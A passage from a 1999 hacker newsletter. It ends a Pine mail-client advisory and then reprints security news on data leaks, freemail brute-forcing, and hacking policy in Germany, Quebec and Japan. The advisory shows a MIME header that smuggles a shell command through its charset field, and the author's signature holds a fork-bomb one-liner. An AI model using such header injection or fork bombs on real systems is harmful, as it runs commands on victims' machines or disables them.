  3448.        MIME-Version: 1.0
  3449.        Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
  3450.        
  3451.        --8323328-235065145-918425607=:319
  3452.        Content-Type: TEXT/PLAIN; charset='US-ASCII'
  3453.        
  3454.        Make a wish...
  3455.        
  3456.        --8323328-235065145-918425607=:319
  3457.        Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
  3458.        Content-Transfer-Encoding: BASE64
  3459.        Content-Description: wish
  3460.        Content-Disposition: attachment; filename="wish.c"
  3461.        
  3462.        ...it could be your last.
  3463.        *************************** MIME MESSAGE ENDS ***************************
  3464.        
  3465.         The result is:
  3466.        
  3467.          [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
  3468.                '[A-Z]' '[a-z]'`" = iso-8859-1)
  3469.        
  3470.          ...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
  3471.          executed when message is viewed.
  3472.        
  3473.        Fix:
  3474.        ----
  3475.        
  3476.          Well, it's the second time I report problems with ` in headers.
  3477.          Maybe pine developers should wait a little longer ;-)
  3478.        
  3479.        _______________________________________________________________________
  3480.        Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
  3481.        [lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
  3482.        [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
  3483.        Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
  3484.        
  3485.   7.0  Hacking in Germany by Qubik
  3486.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3487.        
  3488.        Hacking in Germany.
  3489.        ⌐1999 HWA/Qubik
  3490.  
  3491.          Though visiting Germany is a very common thing for myself, the trip
  3492.        I took last month was the first where I've actually looked into the 
  3493.        Germany hacker scene..
  3494.  
  3495.          The German press seem to support so much of the hacker ethic, the
  3496.        magazines and newspapers are full of interesting interviews, updates
  3497.        and facts. Rather than trying to cover up the fact that hacker exist,
  3498.        like so many others do, they embrace the fact and try to teach the 
  3499.        country of what they do and why they do it. Take for example, CHIP, 
  3500.        it's a computer magazine full of interesting news, not just pages and
  3501.        pages of adverts! One of the articles compares the new generation of 
  3502.        hackers, against what is seen in films. It's full of information on 
  3503.        the CCC, Karl Koch and an interesting interview with Christoph Fischer,
  3504.        who doesn't seem like an idiot reading a script..!
  3505.  
  3506.         This all leads to a strange, yet pleasing, affect, whereby both the 
  3507.        hacker and your average Joe, get along without much tension, and from
  3508.        the impression I got from my associates, hackers in Germany are widely
  3509.        respected.
  3510.  
  3511.         But even in the heaven of Germany, hackerdom is looked down on upon by
  3512.        many, but at least there's a distinction between the good and bad hackers.
  3513.        Who knows, maybe one day I'll move to Germany and live in reasonable peace..
  3514.  
  3515.        Links:  http://www.chip.de/
  3516.                http://www.ccc.de/
  3517.  
  3518.        Have your say: qubik@bikkel.com
  3519.                   cc: hwa@press.usmc.net    
  3520.  
  3521.  
  3522. 8.0  Spotlight on: Project Gamma
  3523.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~   
  3524.   
  3525.        Underground Sites - Project Gamma
  3526.        ⌐1999 HWA/Qubik
  3527.   
  3528.          In the first of a continuing series of reviews, I take a look into a 
  3529.        group called Project Gamma. Who are they? What do they do? And why do 
  3530.        they  do it!? Despite consisting of a nice layout and some great content, 
  3531.        Project Gamma has remained one of the more hidden underground sites. 
  3532.        Having come from solid background as a division of Gamma Force, it's
  3533.        slowly grown into a widely respected resource..
  3534.   
  3535.          It's current membership stands at a healthy five, with the webmaster, 
  3536.        WHiTe VaMPiRe, working non-stop to keep everything working smoothly. The
  3537.        site includes some good news content, specifically targeted at the 
  3538.        underground and some great extras such as the Top100 and webrings.
  3539.   
  3540.          I spoke to him and asked him what it was that compelled him to work as 
  3541.        hard as he does, and like a seasoned spokesperson, he replied with an almost
  3542.        scripted answer..  "I'm just trying to make the most out of my time online."
  3543.        We all know the truth of being an admin of any site, is the attention we get
  3544.        from the opposite sex..!
  3545.   
  3546.         This site deserves more visitors, so if you've got to see one site today,
  3547.        why not make it this one!?
  3548.   
  3549.        Links: http://www.projectgamma.com/
  3550.               http://www.gammaforce.org/
  3551.   
  3552.        Have your say: qubik@bikkel.com   
  3553.                   cc: hwa@press.usmc.net    
  3554.      
  3555.        @HWA       
  3556.        
  3557.   9.0 Secret Cyber Sex; Gary, your secret is out!
  3558.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3559.       
  3560.       Via HNN Source: Nando Times, Kansas City Star
  3561.       
  3562.       Nando: http://www.techserver.com/story/0,1643,17514-28909-212134-0,00.html
  3563.       KCS: http://www.kcstar.com/item/pages/home.pat,local/30dabe6b.211,.html   
  3564.       
  3565.       This is gawd knows how many times in recent weeks that a "misconfigured"
  3566.       search engine has spewed out data to netizens that was intended to be on
  3567.       secure servers or at least supposedly stored in confidence, this time 
  3568.       Hallmark sucks the bullet for this boner:
  3569.       
  3570.       
  3571.      Hallmark computer glitch sends intimate online
  3572.      greetings into public cyberspace 
  3573.  
  3574.       Copyright ⌐ 1999 Nando Media
  3575.       Copyright ⌐ 1999 Associated Press
  3576.  
  3577.      KANSAS CITY, Mo. (February 12, 1999 7:50 a.m. EST http://www.nandotimes.com) - The lovers and
  3578.      flirts sending e-mail Valentines and other notes on Hallmark Cards' online site no doubt
  3579.      intended their musings to be perused only by that special someone. 
  3580.      
  3581.      Unwittingly, they had a potential audience of millions. 
  3582.      
  3583.      A programming error at hallmark.com allowed anyone with a computer and some curiosity to
  3584.      search the Web site for private love notes - and, in many cases, the senders' name, home and
  3585.      e-mail addresses and place of employment. 
  3586.      
  3587.      The security breach surprised customers and executives at the Kansas City-based company,
  3588.      which this week scrambled to modify the computer program after The Kansas City Star
  3589.      reported the problem. Technicians have since deleted all of the old messages. 
  3590.      
  3591.      A Hallmark official said the problem involved only greetings sent a year or more ago. 
  3592.      
  3593.      "It was a programming error," company spokeswoman Julie O'Dell said. "We certainly are
  3594.      committed to providing privacy." 
  3595.      
  3596.      The recipient of a cyber Hallmark greeting card first gets an e-mail from the company, including
  3597.      a password. Then he or she clicks on a Web address to view the card. 
  3598.      
  3599.      But until this week, all those messages were available to anyone who used the site's search
  3600.      engine, the newspaper reported. That means if the word "bear" was typed, for example,
  3601.      Hallmark's computer would have given you a list of Web pages including that word - including
  3602.      one page featuring a sweet message from "Teddy Bear" to his "Honey." 
  3603.      
  3604.      "I had no idea," said Gary Harders of Chicago, who sent one of the cards to his wife. "I
  3605.      assumed it was private. 
  3606.      
  3607.      "It defeats the whole purpose of sending somebody a personal card if everybody and his
  3608.      brother is going to get ahold of it. It could be embarrassing." 
  3609.      
  3610.      O'Dell said she had no idea how many people might have clicked through the greetings. 
  3611.      
  3612.      "This new system has, built in, a new standard to ensure this kind of thing doesn't happen
  3613.      again," she said. "We don't want a lot of people worried. None of the recent electronic
  3614.      greetings were in that file." 
  3615.      
  3616.      According to the Star, some of the messages were obviously not meant for mass consumption.
  3617.      Among them: 
  3618.      
  3619.      - "Gary & I have been having secret cyber sex via computer." 
  3620.      
  3621.      - "I've seen you swing a sledge hammer and the way your muscles ripple ... is amazing." 
  3622.      
  3623.      - "You deserve an extra foot massage tonight!" 
  3624.      
  3625.      Another writer e-mailed an intimate message and a photo of a flower to a woman friend, trying
  3626.      to entice her into a romantic rendezvous. 
  3627.      
  3628.      "You will have the greatest time you've had in 15 years," he assured his friend - unless the other
  3629.      man in her life persuaded her to stay home with him and their children instead. 
  3630.      
  3631.      @HWA
  3632.      
  3633.  10.0  Mr. Lewis, your kidney is out!, 'but but i'm DYIN over here'     
  3634.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3635.        
  3636.         Laugh
  3637.         ~~~~~
  3638.         
  3639.         In a frightening real-life drama that played out over the net in front of 
  3640.         approximately 3000 university BS laureates, Mr Donald Lewis 57 had his
  3641.         kidney removed by accident when a malicious cracker re-wrote his scheduled
  3642.         hemmorhoidal clippage to be performed for 'University Web TV' an outfit that
  3643.         doesn't really exist because this article is full of shit, had ya going there
  3644.         huh? well the scary truth follows: taken from Nando times: (via HNN)
  3645.         
  3646.         
  3647.         Don't laugh
  3648.         ~~~~~~~~~~~
  3649.         
  3650.         Michigan medical records accidentally posted on Web
  3651.         for two months 
  3652.  
  3653.         Copyright ⌐ 1999 Nando Media
  3654.         Copyright ⌐ 1999 Associated Press
  3655.  
  3656.         ANN ARBOR, Mich. (February 12, 1999 12:22 a.m. EST http://www.nandotimes.com)
  3657.         - Several thousand patient records at the University of Michigan Medical Center
  3658.         were available through public Internet sites for two months. 
  3659.        
  3660.        "Luckily, we were notified and able to stop it this time before real damage was 
  3661.        done," spokesman Dave Wilkins said. "Still, on all fronts, we're taking it very
  3662.        seriously." 
  3663.            
  3664.        The problem was discovered Monday when a university student searching for information
  3665.        about a doctor on the medical center's Web site was linked to files containing private
  3666.        patient records.
  3667.              
  3668.        The records contained names, addresses, phone numbers, Social Security numbers,
  3669.        employment status, treatments for specific medical conditions and other data. The
  3670.        information was used to schedule appointments, Wilkins said. 
  3671.        
  3672.        No one accessed the records until Monday, he said. 
  3673.        
  3674.        "I'm certainly not happy about it," said Cary Johnson, a nurse at the medical center whose
  3675.        2-year-old son's record was exposed. "I guess technology is helping us to do some things and
  3676.        hurting us in other ways." 
  3677.         
  3678.        (Sounds like a real pain in the ass ... this reminds me of a time way back in the 80's
  3679.        when a local drugstore kindly donated an old Ohio Scientific multi-processor 6502
  3680.        based machine with a 17" winchester drive in it, complete with medical records, to
  3681.        my computer collection, so much for privacy, guess we haven't come much further
  3682.        in regards to people's medical record privacy today. I mean sure I have an honest
  3683.        face but... maybe someday i'll put that box on the net, or perhaps it would make
  3684.        a great bar fridge or safe housing..hrm..but I digress. - Ed)
  3685.        
  3686.               
  3687.        @HWA
  3688.       
  3689.  11.0  Free email account vulnerabilities
  3690.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3691.        
  3692.        I've mentioned before that Hotmail and the like are not anonymous services and it
  3693.        should come as no surprise to anyone that they are also likely targets for crackers
  3694.        and are probably (I wouldn't know *g*) full of security holes. The biggest "hole"
  3695.        is that unlimited password attempts are allowed and anyone with a real determination
  3696.        to get in that knows anything at all about the target will probably succeed..eventually
  3697.        there are other vulnerabilities beyond the scope of this article that are not discussed
  3698.        and imho more frightening but basically if you want "secure" email ENCRYPT it, if you
  3699.        want anonymity, use nightmail or a remailer but that involves some work on your part.
  3700.        - Ed nightmail ( www.nightmail.com, pretty "anonymous" but full of pr0n banners etc)
  3701.        
  3702.        http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html     
  3703.  
  3704.       Freemail Vulnerabilities
  3705.  
  3706.       If you have an account on Hotmail, Yahoo!, or Excite, it's vulnerable to hackers.
  3707.       By Ira Winkler  February 10, 1999 
  3708.       
  3709.       Free email services are a common feature on portal sites, but some of them have serious
  3710.       security vulnerabilities-- specifically, Yahoo! Mail, Excite Mail, and Hotmail. 
  3711.  
  3712.       First, these three services allow an unlimited number of log-on attempts. This means that
  3713.       malicious Internet users can perform password guessing and "brute force" password attacks
  3714.       against accounts on those systems. (After three failed log-in attempts, Yahoo! does ask the
  3715.       supposed user if they require help. However, additional log-in attempts are not prevented.) 
  3716.  
  3717.       Second, the user is not notified when a number of failed log-in attempts have occurred. If a
  3718.       password attack had been attempted against a user account, the user has no way of knowing. 
  3719.  
  3720.       These vulnerabilities affect a lot of Internet surfers. Free email services are extremely
  3721.       popular as a Web-based alternative to regular Internet service provider accounts. The ability to
  3722.       access mail from any Web browser and a certain level of Internet anonymity are great advantages
  3723.       that these accounts offer. Security, however, is a distinct disadvantage. 
  3724.  
  3725.       The problems probably are not limited to Yahoo!, Excite, and Hotmail. To test whether a particular
  3726.       site is vulnerable to a brute-force attack, simply try entering incorrect passwords. If the system
  3727.       allows more than ten invalid password entries  without locking out the account, then it probably
  3728.       allows an unlimited number of password-cracking attempts. 
  3729.  
  3730.       Password crackers attempt to obtain an account's password by exhaustively guessing
  3731.       word and number combinations. For example, an attacker may use a dictionary as the source of
  3732.       words. More sophisticated password crackers will use word-and-number combinations, such as
  3733.       star99. The most time-consuming technique is to try every possible combination of letters,
  3734.       numbers, and special characters. Such attacks can easily be automated. Password cracking is
  3735.       an extremely common hacker technique. 
  3736.  
  3737.       To prevent brute-force attacks, a security function should lock an account after an
  3738.       excessive number of failed log-in attempts, typically three to five. Once an account is
  3739.       locked, the user should be emailed about the failed log-in attempts and told to contact the
  3740.       system administrators, who will verify the user's identity. While this would cause a temporary
  3741.       interruption of service, it would prevent the account from being compromised. This is a
  3742.       basic security practice that is built into most computer operating systems. 
  3743.  
  3744.       Admittedly, these vulnerabilities are extremely basic. I was not expecting them to exist on all
  3745.       the systems I examined. I take their presence as an indication that security was not a crucial step
  3746.       in designing these systems. 
  3747.       
  3748.       While the sites all state that users should choose their passwords well, they do not
  3749.       account for attacks that can compromise even the best passwords. This leaves users, who
  3750.       number in the thousands or even hundreds of thousands (industry numbers measure accounts,
  3751.       not the number of users), vulnerable to someone with even trivial programming and hacking skills. 
  3752.  
  3753.       While no attacks have been reported, it is likely that they were attempted. It is also a given that
  3754.       they will be attempted and successful unless action is taken. 
  3755.  
  3756.       I contacted Yahoo! and Excite press liaisons about this issue and received no official reply.
  3757.       Hotmail could not be reached by telephone, and email messages to its technical support groups
  3758.       were not returned.    
  3759.       
  3760.       continued at the site ...
  3761.       
  3762.       http://chkpt.zdnet.com/chkpt/zdnu99021301/www.zdnet.com/zdtv/cybercrime/spyfiles/story/0,3700,2205746,00.html     
  3763.       
  3764.       @HWA
  3765.  
  3766.   12.0 Quebec poses hacker challenge to its open networks
  3767.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3768.        Seen on HNN: contributed to HNN by Frenchie 
  3769.        
  3770.        Montreal Gazette: http://www.montrealgazette.com/PAGES/990211/2266737.html
  3771.        Yahoo News- French Version : http://biz.yahoo.com/rf/990210/bjo.html
  3772.        
  3773.        
  3774.        QUEBEC WANTS CHALLENGERS TO TEST ITS COMPUTER SECURITY
  3775.  
  3776.        PAUL CHERRY
  3777.        The Gazette
  3778.  
  3779.        The provincial government is to enlist hackers to test the security
  3780.        of its information networks. 
  3781.  
  3782.        A laboratory will be set up using the same computers - standard
  3783.        desktops with 400 megahertz Intel processors - used by many
  3784.        government services "as well as those used by hackers,"
  3785.        Paul-Andre Comeau, president of the province's Access to
  3786.        Information Commission, said yesterday. 
  3787.  
  3788.        The aim is inform people in charge of computers of recent
  3789.        innovations and of the relative advantages or disadvantages of
  3790.        new gadgets. 
  3791.  
  3792.        "We will also be able to check out how safe the systems can be
  3793.        and how they can be improved," Comeau said. 
  3794.  
  3795.        "In that respect, of course, we will have to be helped by outside
  3796.        people and, at times, like the RCMP does in 
  3797.  
  3798.        Ottawa, by hackers who are converted." 
  3799.  
  3800.        Comeau said reformed hackers are referred to as "white
  3801.        hackers" by the people who now hire them to protect systems. 
  3802.  
  3803.        A 24-year-old former hacker, interviewed by The Gazette last
  3804.        week, now protects an international computer network based in
  3805.        Montreal. 
  3806.  
  3807.        When he was 15, he was able to infiltrate Russian research
  3808.        computers - until he was caught and agreed to lecture RCMP
  3809.        staff on how hackers crack government systems to get
  3810.        information. 
  3811.  
  3812.        Comeau said someone tried for hours to hack into the
  3813.        commission's network two years ago, on a Saturday afternoon. 
  3814.  
  3815.        He said the demand for the extra protection has come not from
  3816.        the larger government ministries and organizations, but from
  3817.        smaller ones that are now trying to modernize and join
  3818.        established computer networks. 
  3819.  
  3820.        Another objective of the laboratory is to advise government
  3821.        services on what types of equipment to buy. 
  3822.  
  3823.        Even simple things like fax machines should be considered with
  3824.        security in mind, Comeau said. 
  3825.  
  3826.        He said the committee is advising government services against
  3827.        sending personal information via faxes, except in exceptional
  3828.        circumstances and after taking precautionary steps. 
  3829.  
  3830.        "We hope that in the coming year, 
  3831.  
  3832.        we will be able to advise hospitals and social institutions to do
  3833.        their own evaluation of their systems," he said, adding that a lot
  3834.        of money is about 
  3835.  
  3836.        to be invested in new information systems. 
  3837.  
  3838.        The laboratory will also examine the safety of equipment used
  3839.        for sharing data among institutions like hospitals and municipal
  3840.        administrations, which keep information that falls under privacy
  3841.        laws. 
  3842.        
  3843.        ⌐1998 The Gazette, a division of Southam Inc.
  3844.        
  3845.        @HWA                             
  3846.        
  3847.        
  3848.  13.0  News from Tokyo 
  3849.        ~~~~~~~~~~~~~~~
  3850.        
  3851.        Contributed by Wile, source: Associated Press (c) 1999 AP
  3852.        
  3853.        TOKYO (AP)  At a secret location somewhere in Tokyo, dozens
  3854.        of specialists in cryptography and electronic media will soon be
  3855.        hard at work patrolling cyberspace.
  3856.     
  3857.        Due to open by July, the new headquarters for the National Police
  3858.        Agency's ``cyber-cop'' squad signals growing concern about
  3859.        computer security as more and more Japanese join the global
  3860.        online revolution.
  3861.     
  3862.        And while unauthorized computer snooping in Japan is less
  3863.        common than in the United States, a sharp jump in
  3864.        computer-related crimes in recent years has rattled authorities.
  3865.     
  3866.        The increase is no surprise  legally, Japan is a hacker's heaven.
  3867.     
  3868.        Breaking into a computer system isn't even a crime in Japan,
  3869.        which sets it apart from most other major industrialized nations.
  3870.        Hackers are free to peep at sensitive data stored in Japanese
  3871.        mainframes so long as they don't destroy or sell any of it.
  3872.     
  3873.        ``We have fallen behind other countries in this area,'' said Kei
  3874.        Hata, a member of Parliament who serves as deputy head of the
  3875.        ruling party's Internet policy committee. ``It's a problem which
  3876.        must be addressed quickly.''
  3877.     
  3878.        Worry about the potential for computer-generated chaos has
  3879.        prompted Tokyo to draft legislation to outlaw unauthorized
  3880.        access. A bill is expected to be submitted in the current session of
  3881.        Parliament, which ends in June.
  3882.     
  3883.        The move comes amid pressure from Washington to bolster
  3884.        international efforts to fight crime in cyberspace and dismay in
  3885.        Japan over abuses such as the widespread transmission of child
  3886.        pornography and even poison sales via suicide-related Websites.
  3887.     
  3888.        The problem is still relatively new to Japan.
  3889.     
  3890.        In 1997, the number of high-tech crimes known to Japanese police
  3891.        climbed to 263, up from 178 the previous year and just 32 in
  3892.        1993.
  3893.     
  3894.        Still, a recent NPA survey showed that only 4 percent of
  3895.        companies and colleges polled reported cases of unauthorized
  3896.        access serious enough to inflict damage on their computer
  3897.        systems.
  3898.     
  3899.        By comparison, the San Francisco-based Computer Security
  3900.        Institute and the FBI found that 64 percent of 520 U.S.
  3901.        corporations, government agencies, financial institutions and
  3902.        universities responding to a 1998 survey had at least one
  3903.        computer security violation within the previous 12 months. More
  3904.        than 70 percent suffered financial losses.
  3905.     
  3906.        Japanese police suspect the true number of computer crimes is
  3907.        much higher than the official figure, and note that many
  3908.        businesses keep security problems under wraps to avoid negative
  3909.        publicity.
  3910.     
  3911.        Companies are particularly reluctant to disclose entanglements
  3912.        with organized crime syndicates, known as the yakuza.
  3913.     
  3914.        ``The yakuza have moved into this field,'' said Shunichi Kawabe,
  3915.        an official in the NPA's information technology bureau. ``They are
  3916.        very interested in making money in this type of business.''
  3917.     
  3918.        He said Internet-brokered gun trafficking, Web page-based
  3919.        pornography distribution and computer-generated financial fraud
  3920.        are among the areas suspected of being targeted.
  3921.     
  3922.        Thrill-seekers are also stirring up trouble.
  3923.     
  3924.        One hacker broke into a computer network used by the Hokkaido
  3925.        University of Education in northern Japan and gained access to
  3926.        login IDs and passwords used by about 1,000 employees and
  3927.        students. The university uncovered the security breach last
  3928.        month and shut down the entire network.
  3929.     
  3930.        Japan plans to step up computer training programs for police, but
  3931.        authorities acknowledge they have a long way to go before
  3932.        catching up with their counterparts in the United States.
  3933.     
  3934.        The good news for the cops is that Japanese hackers also lag
  3935.        behind their cohorts overseas.
  3936.     
  3937.        ``Domestic cyber-criminals are still low-tech,'' said Kawabe.
  3938.     
  3939.        @HWA
  3940.                  
  3941.   H.W  Hacked websites
  3942.        ~~~~~~~~~~~~~~~
  3943.        (via HNN http://www.hackernews.com/)
  3944.        
  3945.        HNN: Feb 11th  contributed by Anonymous 
  3946.        http://www.perkin-elmer.co.jp
  3947.        http://www.micrografx.co.jp
  3948.        http://red.glocom.ac.jp
  3949.        
  3950.        
  3951.        HNN: Feb 12th contributed by telephrk 
  3952.        Jordon Cracked
  3953.        This is presumably the first web site crack in the country of
  3954.        Jordan.
  3955.        http://www.go.com.jo
  3956.                                             
  3957.      
  3958.        Probably a bunch more, frankly i'm getting bored with the whole web
  3959.        cracking thing. there may or may not be more reported next issue.. - Ed
  3960.                  
  3961.   A.0  APPENDICES
  3962.        ~~~~~~~~~~   
  3963.         
  3964.  
  3965.   A.1  PHACVW, sekurity, security, cyberwar links
  3966.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3967.      
  3968.        The links are no longer maintained in this file, there is now a 
  3969.       links section on the http://welcome.to/HWA.hax0r.news/ url so check
  3970.       there for current links etc.
  3971.     
  3972.       The hack FAQ (The #hack/alt.2600 faq)
  3973.       http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
  3974.     
  3975.       Hacker's Jargon File (The quote file)
  3976.       http://www.lysator.liu.se/hackdict/split2/main_index.html
  3977.     
  3978.    
  3979.  
  3980.       International links:(TBC)
  3981.       ~~~~~~~~~~~~~~~~~~~~~~~~~
  3982.       
  3983.       Foreign correspondants and others please send in news site links that
  3984.       have security news from foreign countries for inclusion in this list
  3985.       thanks... - Ed
  3986.       
  3987.       Netherlands...: http://security.pine.nl/
  3988.       Russia........: http://www.tsu.ru/~eugene/
  3989.       Indonesia.....: http://www.k-elektronik.org/index2.html
  3990.                       http://members.xoom.com/neblonica/
  3991.       Brasil........: http://www.psynet.net/ka0z
  3992.                       http://www.elementais.cjb.net           
  3993.  
  3994.     Got a link for this section? email it to hwa@press.usmc.net and i'll 
  3995.     review it and post it here if it merits it. 
  3996.     
  3997.     
  3998.  
  3999.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-  
  4000.     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--       
  4001.        
  4002.     ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news
  4003.     (r) Cruciphux is a trade mark of Harpies With Ailments corp.
  4004.     
  4005.  
  4006.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  4007.   
  4008.      Hackerz Without Attitudez Information Warfare Alliance Website
  4009.      Opening soon:
  4010.                           www.hwa-iwa.org
  4011.                          
  4012.     
  4013.      --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  4014.   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
  4015.    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  4016.        [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]     
  4017.  
  4018.